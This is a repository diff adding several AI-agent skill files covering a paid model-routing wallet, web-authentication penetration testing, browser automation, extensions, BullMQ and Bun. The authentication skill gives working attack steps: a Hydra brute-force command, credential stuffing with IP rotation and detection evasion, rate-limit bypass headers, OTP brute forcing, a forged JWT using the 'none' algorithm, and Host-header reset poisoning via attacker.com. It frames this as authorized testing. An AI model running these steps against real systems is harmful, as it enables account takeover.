Modern .NET execution model with process isolation
### Node.js v4 Programming Model
Modern code-centric approach for TypeScript/JavaScript
### Python v2 Programming Model
Decorator-based approach for Python functions
## Anti-Patterns
### ❌ Blocking Async Calls
### ❌ New HttpClient Per Request
### ❌ In-Process Model for New Projects
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | ## Use async pattern with Durable Functions |
| Issue | high | ## Use IHttpClientFactory (Recommended) |
| Issue | high | ## Always use async/await |
| Issue | medium | ## Configure maximum timeout (Consumption) |
| Issue | high | ## Use isolated worker for new projects |
| Issue | medium | ## Configure Application Insights properly |
| Issue | medium | ## Check extension bundle (most common) |
| Issue | medium | ## Add warmup trigger to initialize your code |

292
skills/blockrun/SKILL.md Normal file
View File

@@ -0,0 +1,292 @@
---
name: blockrun
description: Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek")
allowed-tools: Read, Bash(python:*), Bash(python3:*), Bash(pip:*), Bash(source:*)
---
# BlockRun
**BlockRun works with Claude Code and Google Antigravity.**
You can't generate images. You have no real-time X/Twitter access. BlockRun gives you these capabilities.
## Philosophy
You have a wallet. When you need a capability you lack, you pay for it autonomously.
| You Need | You Call | Pricing |
|----------|----------|---------|
| Image generation | DALL-E | $0.04/image |
| Real-time X data | Grok + Live Search | $0.025/source |
| Second opinion | GPT-5.2 | $1.75/M input, $14/M output |
| Cheaper processing | DeepSeek | $0.14/M input, $0.28/M output |
**How it works:** BlockRun uses x402 micropayments to route your requests to OpenAI, xAI, Google, and other providers. No API keys needed - your wallet pays per token.
## Budget Control (Optional)
If the user specifies a budget (e.g., "use at most $1"), track spending and stop when budget is reached:
```python
from blockrun_llm import setup_agent_wallet
client = setup_agent_wallet()
budget = 1.0 # User's budget
# Before each call, check if within budget
spending = client.get_spending()
if spending['total_usd'] >= budget:
print(f"Budget reached: ${spending['total_usd']:.4f} spent")
# Stop making calls
else:
response = client.chat("openai/gpt-5.2", "Hello!")
# At the end, report spending
spending = client.get_spending()
print(f"💰 Total spent: ${spending['total_usd']:.4f} across {spending['calls']} calls")
```
## When to Use
| Trigger | Your Action |
|---------|-------------|
| User explicitly requests ("blockrun second opinion with GPT on...", "use grok to check...", "generate image with dall-e") | Execute via BlockRun |
| User needs something you can't do (images, live X data) | Suggest BlockRun, wait for confirmation |
| You can handle the task fine | Do it yourself, don't mention BlockRun |
## Example User Prompts
Users will say things like:
| User Says | What You Do |
|-----------|-------------|
| "blockrun generate an image of a sunset" | Call DALL-E via ImageClient |
| "use grok to check what's trending on X" | Call Grok with `search=True` |
| "blockrun GPT review this code" | Call GPT-5.2 via LLMClient |
| "what's the latest news about AI agents?" | Suggest Grok (you lack real-time data) |
| "generate a logo for my startup" | Suggest DALL-E (you can't generate images) |
| "blockrun check my balance" | Show wallet balance via `get_balance()` |
| "blockrun deepseek summarize this file" | Call DeepSeek for cost savings |
## Wallet & Balance
Use `setup_agent_wallet()` to auto-create a wallet and get a client. This shows the QR code and welcome message on first use.
**Initialize client (always start with this):**
```python
from blockrun_llm import setup_agent_wallet
client = setup_agent_wallet() # Auto-creates wallet, shows QR if new
```
**Check balance (when user asks "show balance", "check wallet", etc.):**
```python
balance = client.get_balance() # On-chain USDC balance
print(f"Balance: ${balance:.2f} USDC")
print(f"Wallet: {client.get_wallet_address()}")
```
**Show QR code for funding:**
```python
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address
# ASCII QR for terminal display
print(generate_wallet_qr_ascii(get_wallet_address()))
```
## SDK Usage
**Prerequisite:** Install the SDK with `pip install blockrun-llm`
### Basic Chat
```python
from blockrun_llm import setup_agent_wallet
client = setup_agent_wallet() # Auto-creates wallet if needed
response = client.chat("openai/gpt-5.2", "What is 2+2?")
print(response)
# Check spending
spending = client.get_spending()
print(f"Spent ${spending['total_usd']:.4f}")
```
### Real-time X/Twitter Search (xAI Live Search)
**IMPORTANT:** For real-time X/Twitter data, you MUST enable Live Search with `search=True` or `search_parameters`.
```python
from blockrun_llm import setup_agent_wallet
client = setup_agent_wallet()
# Simple: Enable live search with search=True
response = client.chat(
"xai/grok-3",
"What are the latest posts from @blockrunai on X?",
search=True # Enables real-time X/Twitter search
)
print(response)
```
### Advanced X Search with Filters
```python
from blockrun_llm import setup_agent_wallet
client = setup_agent_wallet()
response = client.chat(
"xai/grok-3",
"Analyze @blockrunai's recent content and engagement",
search_parameters={
"mode": "on",
"sources": [
{
"type": "x",
"included_x_handles": ["blockrunai"],
"post_favorite_count": 5
}
],
"max_search_results": 20,
"return_citations": True
}
)
print(response)
```
### Image Generation
```python
from blockrun_llm import ImageClient
client = ImageClient()
result = client.generate("A cute cat wearing a space helmet")
print(result.data[0].url)
```
## xAI Live Search Reference
Live Search is xAI's real-time data API. Cost: **$0.025 per source** (default 10 sources = ~$0.26).
To reduce costs, set `max_search_results` to a lower value:
```python
# Only use 5 sources (~$0.13)
response = client.chat("xai/grok-3", "What's trending?",
search_parameters={"mode": "on", "max_search_results": 5})
```
### Search Parameters
| Parameter | Type | Default | Description |
|-----------|------|---------|-------------|
| `mode` | string | "auto" | "off", "auto", or "on" |
| `sources` | array | web,news,x | Data sources to query |
| `return_citations` | bool | true | Include source URLs |
| `from_date` | string | - | Start date (YYYY-MM-DD) |
| `to_date` | string | - | End date (YYYY-MM-DD) |
| `max_search_results` | int | 10 | Max sources to return (customize to control cost) |
### Source Types
**X/Twitter Source:**
```python
{
"type": "x",
"included_x_handles": ["handle1", "handle2"], # Max 10
"excluded_x_handles": ["spam_account"], # Max 10
"post_favorite_count": 100, # Min likes threshold
"post_view_count": 1000 # Min views threshold
}
```
**Web Source:**
```python
{
"type": "web",
"country": "US", # ISO alpha-2 code
"allowed_websites": ["example.com"], # Max 5
"safe_search": True
}
```
**News Source:**
```python
{
"type": "news",
"country": "US",
"excluded_websites": ["tabloid.com"] # Max 5
}
```
## Available Models
| Model | Best For | Pricing |
|-------|----------|---------|
| `openai/gpt-5.2` | Second opinions, code review, general | $1.75/M in, $14/M out |
| `openai/gpt-5-mini` | Cost-optimized reasoning | $0.30/M in, $1.20/M out |
| `openai/o4-mini` | Latest efficient reasoning | $1.10/M in, $4.40/M out |
| `openai/o3` | Advanced reasoning, complex problems | $10/M in, $40/M out |
| `xai/grok-3` | Real-time X/Twitter data | $3/M + $0.025/source |
| `deepseek/deepseek-chat` | Simple tasks, bulk processing | $0.14/M in, $0.28/M out |
| `google/gemini-2.5-flash` | Very long documents, fast | $0.15/M in, $0.60/M out |
| `openai/dall-e-3` | Photorealistic images | $0.04/image |
| `google/nano-banana` | Fast, artistic images | $0.01/image |
*M = million tokens. Actual cost depends on your prompt and response length.*
## Cost Reference
All LLM costs are per million tokens (M = 1,000,000 tokens).
| Model | Input | Output |
|-------|-------|--------|
| GPT-5.2 | $1.75/M | $14.00/M |
| GPT-5-mini | $0.30/M | $1.20/M |
| Grok-3 (no search) | $3.00/M | $15.00/M |
| DeepSeek | $0.14/M | $0.28/M |
| Fixed Cost Actions | |
|-------|--------|
| Grok Live Search | $0.025/source (default 10 = $0.25) |
| DALL-E image | $0.04/image |
| Nano Banana image | $0.01/image |
**Typical costs:** A 500-word prompt (~750 tokens) to GPT-5.2 costs ~$0.001 input. A 1000-word response (~1500 tokens) costs ~$0.02 output.
## Setup & Funding
**Wallet location:** `$HOME/.blockrun/.session` (e.g., `/Users/username/.blockrun/.session`)
**First-time setup:**
1. Wallet auto-creates when `setup_agent_wallet()` is called
2. Check wallet and balance:
```python
from blockrun_llm import setup_agent_wallet
client = setup_agent_wallet()
print(f"Wallet: {client.get_wallet_address()}")
print(f"Balance: ${client.get_balance():.2f} USDC")
```
3. Fund wallet with $1-5 USDC on Base network
**Show QR code for funding (ASCII for terminal):**
```python
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address
print(generate_wallet_qr_ascii(get_wallet_address()))
```
## Troubleshooting
**"Grok says it has no real-time access"**
→ You forgot to enable Live Search. Add `search=True`:
```python
response = client.chat("xai/grok-3", "What's trending?", search=True)
```
**Module not found**
→ Install the SDK: `pip install blockrun-llm`
## Updates
```bash
pip install --upgrade blockrun-llm
```

473
skills/broken-authentication/SKILL.md Normal file
View File

@@ -0,0 +1,473 @@
---
name: Broken Authentication Testing
description: This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
---
# Broken Authentication Testing
## Purpose
Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.
## Prerequisites
### Required Knowledge
- HTTP protocol and session mechanisms
- Authentication types (SFA, 2FA, MFA)
- Cookie and token handling
- Common authentication frameworks
### Required Tools
- Burp Suite Professional or Community
- Hydra or similar brute-force tools
- Custom wordlists for credential testing
- Browser developer tools
### Required Access
- Target application URL
- Test account credentials
- Written authorization for testing
## Outputs and Deliverables
1. **Authentication Assessment Report** - Document all identified vulnerabilities
2. **Credential Testing Results** - Brute-force and dictionary attack outcomes
3. **Session Security Analysis** - Token randomness and timeout evaluation
4. **Remediation Recommendations** - Security hardening guidance
## Core Workflow
### Phase 1: Authentication Mechanism Analysis
Understand the application's authentication architecture:
```
# Identify authentication type
- Password-based (forms, basic auth, digest)
- Token-based (JWT, OAuth, API keys)
- Certificate-based (mutual TLS)
- Multi-factor (SMS, TOTP, hardware tokens)
# Map authentication endpoints
/login, /signin, /authenticate
/register, /signup
/forgot-password, /reset-password
/logout, /signout
/api/auth/*, /oauth/*
```
Capture and analyze authentication requests:
```http
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
username=test&password=test123
```
### Phase 2: Password Policy Testing
Evaluate password requirements and enforcement:
```bash
# Test minimum length (a, ab, abcdefgh)
# Test complexity (password, password1, Password1!)
# Test common weak passwords (123456, password, qwerty, admin)
# Test username as password (admin/admin, test/test)
```
Document policy gaps: Minimum length <8, no complexity, common passwords allowed, username as password.
### Phase 3: Credential Enumeration
Test for username enumeration vulnerabilities:
```bash
# Compare responses for valid vs invalid usernames
# Invalid: "Invalid username" vs Valid: "Invalid password"
# Check timing differences, response codes, registration messages
```
# Password reset
"Email sent if account exists" (secure)
"No account with that email" (leaks info)
# API responses
{"error": "user_not_found"}
{"error": "invalid_password"}
```
### Phase 4: Brute Force Testing
Test account lockout and rate limiting:
```bash
# Using Hydra for form-based auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
target.com http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
# Using Burp Intruder
1. Capture login request
2. Send to Intruder
3. Set payload positions on password field
4. Load wordlist
5. Start attack
6. Analyze response lengths/codes
```
Check for protections:
```bash
# Account lockout
- After how many attempts?
- Duration of lockout?
- Lockout notification?
# Rate limiting
- Requests per minute limit?
- IP-based or account-based?
- Bypass via headers (X-Forwarded-For)?
# CAPTCHA
- After failed attempts?
- Easily bypassable?
```
### Phase 5: Credential Stuffing
Test with known breached credentials:
```bash
# Credential stuffing differs from brute force
# Uses known email:password pairs from breaches
# Using Burp Intruder with Pitchfork attack
1. Set username and password as positions
2. Load email list as payload 1
3. Load password list as payload 2 (matched pairs)
4. Analyze for successful logins
# Detection evasion
- Slow request rate
- Rotate source IPs
- Randomize user agents
- Add delays between attempts
```
### Phase 6: Session Management Testing
Analyze session token security:
```bash
# Capture session cookie
Cookie: SESSIONID=abc123def456
# Test token characteristics
1. Entropy - Is it random enough?
2. Length - Sufficient length (128+ bits)?
3. Predictability - Sequential patterns?
4. Secure flags - HttpOnly, Secure, SameSite?
```
Session token analysis:
```python
#!/usr/bin/env python3
import requests
import hashlib
# Collect multiple session tokens
tokens = []
for i in range(100):
response = requests.get("https://target.com/login")
token = response.cookies.get("SESSIONID")
tokens.append(token)
# Analyze for patterns
# Check for sequential increments
# Calculate entropy
# Look for timestamp components
```
### Phase 7: Session Fixation Testing
Test if session is regenerated after authentication:
```bash
# Step 1: Get session before login
GET /login HTTP/1.1
Response: Set-Cookie: SESSIONID=abc123
# Step 2: Login with same session
POST /login HTTP/1.1
Cookie: SESSIONID=abc123
username=valid&password=valid
# Step 3: Check if session changed
# VULNERABLE if SESSIONID remains abc123
# SECURE if new session assigned after login
```
Attack scenario:
```bash
# Attacker workflow:
1. Attacker visits site, gets session: SESSIONID=attacker_session
2. Attacker sends link to victim with fixed session:
https://target.com/login?SESSIONID=attacker_session
3. Victim logs in with attacker's session
4. Attacker now has authenticated session
```
### Phase 8: Session Timeout Testing
Verify session expiration policies:
```bash
# Test idle timeout
1. Login and note session cookie
2. Wait without activity (15, 30, 60 minutes)
3. Attempt to use session
4. Check if session is still valid
# Test absolute timeout
1. Login and continuously use session
2. Check if forced logout after set period (8 hours, 24 hours)
# Test logout functionality
1. Login and note session
2. Click logout
3. Attempt to reuse old session cookie
4. Session should be invalidated server-side
```
### Phase 9: Multi-Factor Authentication Testing
Assess MFA implementation security:
```bash
# OTP brute force
- 4-digit OTP = 10,000 combinations
- 6-digit OTP = 1,000,000 combinations
- Test rate limiting on OTP endpoint
# OTP bypass techniques
- Skip MFA step by direct URL access
- Modify response to indicate MFA passed
- Null/empty OTP submission
- Previous valid OTP reuse
# API Version Downgrade Attack (crAPI example)
# If /api/v3/check-otp has rate limiting, try older versions:
POST /api/v2/check-otp
{"otp": "1234"}
# Older API versions may lack security controls
# Using Burp for OTP testing
1. Capture OTP verification request
2. Send to Intruder
3. Set OTP field as payload position
4. Use numbers payload (0000-9999)
5. Check for successful bypass
```
Test MFA enrollment:
```bash
# Forced enrollment
- Can MFA be skipped during setup?
- Can backup codes be accessed without verification?
# Recovery process
- Can MFA be disabled via email alone?
- Social engineering potential?
```
### Phase 10: Password Reset Testing
Analyze password reset security:
```bash
# Token security
1. Request password reset
2. Capture reset link
3. Analyze token:
- Length and randomness
- Expiration time
- Single-use enforcement
- Account binding
# Token manipulation
https://target.com/reset?token=abc123&user=victim
# Try changing user parameter while using valid token
# Host header injection
POST /forgot-password HTTP/1.1
Host: attacker.com
email=victim@email.com
# Reset email may contain attacker's domain
```
## Quick Reference
### Common Vulnerability Types
| Vulnerability | Risk | Test Method |
|--------------|------|-------------|
| Weak passwords | High | Policy testing, dictionary attack |
| No lockout | High | Brute force testing |
| Username enumeration | Medium | Differential response analysis |
| Session fixation | High | Pre/post-login session comparison |
| Weak session tokens | High | Entropy analysis |
| No session timeout | Medium | Long-duration session testing |
| Insecure password reset | High | Token analysis, workflow bypass |
| MFA bypass | Critical | Direct access, response manipulation |
### Credential Testing Payloads
```bash
# Default credentials
admin:admin
admin:password
admin:123456
root:root
test:test
user:user
# Common passwords
123456
password
12345678
qwerty
abc123
password1
admin123
# Breached credential databases
- Have I Been Pwned dataset
- SecLists passwords
- Custom targeted lists
```
### Session Cookie Flags
| Flag | Purpose | Vulnerability if Missing |
|------|---------|------------------------|
| HttpOnly | Prevent JS access | XSS can steal session |
| Secure | HTTPS only | Sent over HTTP |
| SameSite | CSRF protection | Cross-site requests allowed |
| Path | URL scope | Broader exposure |
| Domain | Domain scope | Subdomain access |
| Expires | Lifetime | Persistent sessions |
### Rate Limiting Bypass Headers
```http
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
```
## Constraints and Limitations
### Legal Requirements
- Only test with explicit written authorization
- Avoid testing with real breached credentials
- Do not access actual user accounts
- Document all testing activities
### Technical Limitations
- CAPTCHA may prevent automated testing
- Rate limiting affects brute force timing
- MFA significantly increases attack difficulty
- Some vulnerabilities require victim interaction
### Scope Considerations
- Test accounts may behave differently than production
- Some features may be disabled in test environments
- Third-party authentication may be out of scope
- Production testing requires extra caution
## Examples
### Example 1: Account Lockout Bypass
**Scenario:** Test if account lockout can be bypassed
```bash
# Step 1: Identify lockout threshold
# Try 5 wrong passwords for admin account
# Result: "Account locked for 30 minutes"
# Step 2: Test bypass via IP rotation
# Use X-Forwarded-For header
POST /login HTTP/1.1
X-Forwarded-For: 192.168.1.1
username=admin&password=attempt1
# Increment IP for each attempt
X-Forwarded-For: 192.168.1.2
# Continue until successful or confirmed blocked
# Step 3: Test bypass via case manipulation
username=Admin (vs admin)
username=ADMIN
# Some systems treat these as different accounts
```
### Example 2: JWT Token Attack
**Scenario:** Exploit weak JWT implementation
```bash
# Step 1: Capture JWT token
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
# Step 2: Decode and analyze
# Header: {"alg":"HS256","typ":"JWT"}
# Payload: {"user":"test","role":"user"}
# Step 3: Try "none" algorithm attack
# Change header to: {"alg":"none","typ":"JWT"}
# Remove signature
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
# Step 4: Submit modified token
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
```
### Example 3: Password Reset Token Exploitation
**Scenario:** Test password reset functionality
```bash
# Step 1: Request reset for test account
POST /forgot-password
email=test@example.com
# Step 2: Capture reset link
https://target.com/reset?token=a1b2c3d4e5f6
# Step 3: Test token properties
# Reuse: Try using same token twice
# Expiration: Wait 24+ hours and retry
# Modification: Change characters in token
# Step 4: Test for user parameter manipulation
https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
# Check if admin's password can be reset with test user's token
```
## Troubleshooting
| Issue | Solutions |
|-------|-----------|
| Brute force too slow | Identify rate limit scope; IP rotation; add delays; use targeted wordlists |
| Session analysis inconclusive | Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts |
| MFA cannot be bypassed | Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment |
| Account lockout prevents testing | Request multiple test accounts; test threshold first; use slower timing |

70
skills/browser-automation/SKILL.md Normal file
View File

@@ -0,0 +1,70 @@
---
name: browser-automation
description: "Browser automation powers web testing, scraping, and AI agent interactions. The difference between a flaky script and a reliable system comes down to understanding selectors, waiting strategies, and anti-detection patterns. This skill covers Playwright (recommended) and Puppeteer, with patterns for testing, scraping, and agentic browser control. Key insight: Playwright won the framework war. Unless you need Puppeteer's stealth ecosystem or are Chrome-only, Playwright is the better choice in 202"
source: vibeship-spawner-skills (Apache 2.0)
---
# Browser Automation
You are a browser automation expert who has debugged thousands of flaky tests
and built scrapers that run for years without breaking. You've seen the
evolution from Selenium to Puppeteer to Playwright and understand exactly
when each tool shines.
Your core insight: Most automation failures come from three sources - bad
selectors, missing waits, and detection systems. You teach people to think
like the browser, use the right selectors, and let Playwright's auto-wait
do its job.
For scraping, yo
## Capabilities
- browser-automation
- playwright
- puppeteer
- headless-browsers
- web-scraping
- browser-testing
- e2e-testing
- ui-automation
- selenium-alternatives
## Patterns
### Test Isolation Pattern
Each test runs in complete isolation with fresh state
### User-Facing Locator Pattern
Select elements the way users see them
### Auto-Wait Pattern
Let Playwright wait automatically, never add manual waits
## Anti-Patterns
### ❌ Arbitrary Timeouts
### ❌ CSS/XPath First
### ❌ Single Browser Context for Everything
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | # REMOVE all waitForTimeout calls |
| Issue | high | # Use user-facing locators instead: |
| Issue | high | # Use stealth plugins: |
| Issue | high | # Each test must be fully isolated: |
| Issue | medium | # Enable traces for failures: |
| Issue | medium | # Set consistent viewport: |
| Issue | high | # Add delays between requests: |
| Issue | medium | # Wait for popup BEFORE triggering it: |
## Related Skills
Works well with: `agent-tool-builder`, `workflow-automation`, `computer-use-agents`, `test-architect`

261
skills/browser-extension-builder/SKILL.md Normal file
View File

@@ -0,0 +1,261 @@
---
name: browser-extension-builder
description: "Expert in building browser extensions that solve real problems - Chrome, Firefox, and cross-browser extensions. Covers extension architecture, manifest v3, content scripts, popup UIs, monetization strategies, and Chrome Web Store publishing. Use when: browser extension, chrome extension, firefox addon, extension, manifest v3."
source: vibeship-spawner-skills (Apache 2.0)
---
# Browser Extension Builder
**Role**: Browser Extension Architect
You extend the browser to give users superpowers. You understand the
unique constraints of extension development - permissions, security,
store policies. You build extensions that people install and actually
use daily. You know the difference between a toy and a tool.
## Capabilities
- Extension architecture
- Manifest v3 (MV3)
- Content scripts
- Background workers
- Popup interfaces
- Extension monetization
- Chrome Web Store publishing
- Cross-browser support
## Patterns
### Extension Architecture
Structure for modern browser extensions
**When to use**: When starting a new extension
```javascript
## Extension Architecture
### Project Structure
```
extension/
├── manifest.json # Extension config
├── popup/
│ ├── popup.html # Popup UI
│ ├── popup.css
│ └── popup.js
├── content/
│ └── content.js # Runs on web pages
├── background/
│ └── service-worker.js # Background logic
├── options/
│ ├── options.html # Settings page
│ └── options.js
└── icons/
├── icon16.png
├── icon48.png
└── icon128.png
```
### Manifest V3 Template
```json
{
"manifest_version": 3,
"name": "My Extension",
"version": "1.0.0",
"description": "What it does",
"permissions": ["storage", "activeTab"],
"action": {
"default_popup": "popup/popup.html",
"default_icon": {
"16": "icons/icon16.png",
"48": "icons/icon48.png",
"128": "icons/icon128.png"
}
},
"content_scripts": [{
"matches": ["<all_urls>"],
"js": ["content/content.js"]
}],
"background": {
"service_worker": "background/service-worker.js"
},
"options_page": "options/options.html"
}
```
### Communication Pattern
```
Popup ←→ Background (Service Worker) ←→ Content Script
chrome.storage
```
```
### Content Scripts
Code that runs on web pages
**When to use**: When modifying or reading page content
```javascript
## Content Scripts
### Basic Content Script
```javascript
// content.js - Runs on every matched page
// Wait for page to load
document.addEventListener('DOMContentLoaded', () => {
// Modify the page
const element = document.querySelector('.target');
if (element) {
element.style.backgroundColor = 'yellow';
}
});
// Listen for messages from popup/background
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
if (message.action === 'getData') {
const data = document.querySelector('.data')?.textContent;
sendResponse({ data });
}
return true; // Keep channel open for async
});
```
### Injecting UI
```javascript
// Create floating UI on page
function injectUI() {
const container = document.createElement('div');
container.id = 'my-extension-ui';
container.innerHTML = `
<div style="position: fixed; bottom: 20px; right: 20px;
background: white; padding: 16px; border-radius: 8px;
box-shadow: 0 4px 12px rgba(0,0,0,0.15); z-index: 10000;">
<h3>My Extension</h3>
<button id="my-extension-btn">Click me</button>
</div>
`;
document.body.appendChild(container);
document.getElementById('my-extension-btn').addEventListener('click', () => {
// Handle click
});
}
injectUI();
```
### Permissions for Content Scripts
```json
{
"content_scripts": [{
"matches": ["https://specific-site.com/*"],
"js": ["content.js"],
"run_at": "document_end"
}]
}
```
```
### Storage and State
Persisting extension data
**When to use**: When saving user settings or data
```javascript
## Storage and State
### Chrome Storage API
```javascript
// Save data
chrome.storage.local.set({ key: 'value' }, () => {
console.log('Saved');
});
// Get data
chrome.storage.local.get(['key'], (result) => {
console.log(result.key);
});
// Sync storage (syncs across devices)
chrome.storage.sync.set({ setting: true });
// Watch for changes
chrome.storage.onChanged.addListener((changes, area) => {
if (changes.key) {
console.log('key changed:', changes.key.newValue);
}
});
```
### Storage Limits
| Type | Limit |
|------|-------|
| local | 5MB |
| sync | 100KB total, 8KB per item |
### Async/Await Pattern
```javascript
// Modern async wrapper
async function getStorage(keys) {
return new Promise((resolve) => {
chrome.storage.local.get(keys, resolve);
});
}
async function setStorage(data) {
return new Promise((resolve) => {
chrome.storage.local.set(data, resolve);
});
}
// Usage
const { settings } = await getStorage(['settings']);
await setStorage({ settings: { ...settings, theme: 'dark' } });
```
```
## Anti-Patterns
### ❌ Requesting All Permissions
**Why bad**: Users won't install.
Store may reject.
Security risk.
Bad reviews.
**Instead**: Request minimum needed.
Use optional permissions.
Explain why in description.
Request at time of use.
### ❌ Heavy Background Processing
**Why bad**: MV3 terminates idle workers.
Battery drain.
Browser slows down.
Users uninstall.
**Instead**: Keep background minimal.
Use alarms for periodic tasks.
Offload to content scripts.
Cache aggressively.
### ❌ Breaking on Updates
**Why bad**: Selectors change.
APIs change.
Angry users.
Bad reviews.
**Instead**: Use stable selectors.
Add error handling.
Monitor for breakage.
Update quickly when broken.
## Related Skills
Works well with: `frontend`, `micro-saas-launcher`, `personal-tool-builder`

57
skills/bullmq-specialist/SKILL.md Normal file
View File

@@ -0,0 +1,57 @@
---
name: bullmq-specialist
description: "BullMQ expert for Redis-backed job queues, background processing, and reliable async execution in Node.js/TypeScript applications. Use when: bullmq, bull queue, redis queue, background job, job queue."
source: vibeship-spawner-skills (Apache 2.0)
---
# BullMQ Specialist
You are a BullMQ expert who has processed billions of jobs in production.
You understand that queues are the backbone of scalable applications - they
decouple services, smooth traffic spikes, and enable reliable async processing.
You've debugged stuck jobs at 3am, optimized worker concurrency for maximum
throughput, and designed job flows that handle complex multi-step processes.
You know that most queue problems are actually Redis problems or application
design problems.
Your core philosophy:
## Capabilities
- bullmq-queues
- job-scheduling
- delayed-jobs
- repeatable-jobs
- job-priorities
- rate-limiting-jobs
- job-events
- worker-patterns
- flow-producers
- job-dependencies
## Patterns
### Basic Queue Setup
Production-ready BullMQ queue with proper configuration
### Delayed and Scheduled Jobs
Jobs that run at specific times or after delays
### Job Flows and Dependencies
Complex multi-step job processing with parent-child relationships
## Anti-Patterns
### ❌ Giant Job Payloads
### ❌ No Dead Letter Queue
### ❌ Infinite Concurrency
## Related Skills
Works well with: `redis-specialist`, `backend`, `nextjs-app-router`, `email-systems`, `ai-workflow-automation`, `performance-hunter`

691
skills/bun-development/SKILL.md Normal file
View File

@@ -0,0 +1,691 @@
---
name: bun-development
description: "Modern JavaScript/TypeScript development with Bun runtime. Covers package management, bundling, testing, and migration from Node.js. Use when working with Bun, optimizing JS/TS development speed, or migrating from Node.js to Bun."
---
# ⚡ Bun Development
> Fast, modern JavaScript/TypeScript development with the Bun runtime, inspired by [oven-sh/bun](https://github.com/oven-sh/bun).
## When to Use This Skill
Use this skill when:
- Starting new JS/TS projects with Bun
- Migrating from Node.js to Bun
- Optimizing development speed
- Using Bun's built-in tools (bundler, test runner)
- Troubleshooting Bun-specific issues
---
## 1. Getting Started
### 1.1 Installation
```bash
# macOS / Linux
curl -fsSL https://bun.sh/install | bash
# Windows
powershell -c "irm bun.sh/install.ps1 | iex"
# Homebrew
brew tap oven-sh/bun
brew install bun
# npm (if needed)
npm install -g bun
# Upgrade
bun upgrade
```
### 1.2 Why Bun?
| Feature | Bun | Node.js |
| :-------------- | :------------- | :-------------------------- |
| Startup time | ~25ms | ~100ms+ |
| Package install | 10-100x faster | Baseline |
| TypeScript | Native | Requires transpiler |
| JSX | Native | Requires transpiler |
| Test runner | Built-in | External (Jest, Vitest) |
| Bundler | Built-in | External (Webpack, esbuild) |
---
## 2. Project Setup
### 2.1 Create New Project
```bash
# Initialize project
bun init
# Creates:
# ├── package.json
# ├── tsconfig.json
# ├── index.ts
# └── README.md
# With specific template
bun create <template> <project-name>
# Examples
bun create react my-app # React app
bun create next my-app # Next.js app
bun create vite my-app # Vite app
bun create elysia my-api # Elysia API
```
### 2.2 package.json
```json
{
"name": "my-bun-project",
"version": "1.0.0",
"module": "index.ts",
"type": "module",
"scripts": {
"dev": "bun run --watch index.ts",
"start": "bun run index.ts",
"test": "bun test",
"build": "bun build ./index.ts --outdir ./dist",
"lint": "bunx eslint ."
},
"devDependencies": {
"@types/bun": "latest"
},
"peerDependencies": {
"typescript": "^5.0.0"
}
}
```
### 2.3 tsconfig.json (Bun-optimized)
```json
{
"compilerOptions": {
"lib": ["ESNext"],
"module": "esnext",
"target": "esnext",
"moduleResolution": "bundler",
"moduleDetection": "force",
"allowImportingTsExtensions": true,
"noEmit": true,
"composite": true,
"strict": true,
"downlevelIteration": true,
"skipLibCheck": true,
"jsx": "react-jsx",
"allowSyntheticDefaultImports": true,
"forceConsistentCasingInFileNames": true,
"allowJs": true,
"types": ["bun-types"]
}
}
```
---
## 3. Package Management
### 3.1 Installing Packages
```bash
# Install from package.json
bun install # or 'bun i'
# Add dependencies
bun add express # Regular dependency
bun add -d typescript # Dev dependency
bun add -D @types/node # Dev dependency (alias)
bun add --optional pkg # Optional dependency
# From specific registry
bun add lodash --registry https://registry.npmmirror.com
# Install specific version
bun add react@18.2.0
bun add react@latest
bun add react@next
# From git
bun add github:user/repo
bun add git+https://github.com/user/repo.git
```
### 3.2 Removing & Updating
```bash
# Remove package
bun remove lodash
# Update packages
bun update # Update all
bun update lodash # Update specific
bun update --latest # Update to latest (ignore ranges)
# Check outdated
bun outdated
```
### 3.3 bunx (npx equivalent)
```bash
# Execute package binaries
bunx prettier --write .
bunx tsc --init
bunx create-react-app my-app
# With specific version
bunx -p typescript@4.9 tsc --version
# Run without installing
bunx cowsay "Hello from Bun!"
```
### 3.4 Lockfile
```bash
# bun.lockb is a binary lockfile (faster parsing)
# To generate text lockfile for debugging:
bun install --yarn # Creates yarn.lock
# Trust existing lockfile
bun install --frozen-lockfile
```
---
## 4. Running Code
### 4.1 Basic Execution
```bash
# Run TypeScript directly (no build step!)
bun run index.ts
# Run JavaScript
bun run index.js
# Run with arguments
bun run server.ts --port 3000
# Run package.json script
bun run dev
bun run build
# Short form (for scripts)
bun dev
bun build
```
### 4.2 Watch Mode
```bash
# Auto-restart on file changes
bun --watch run index.ts
# With hot reloading
bun --hot run server.ts
```
### 4.3 Environment Variables
```typescript
// .env file is loaded automatically!
// Access environment variables
const apiKey = Bun.env.API_KEY;
const port = Bun.env.PORT ?? "3000";
// Or use process.env (Node.js compatible)
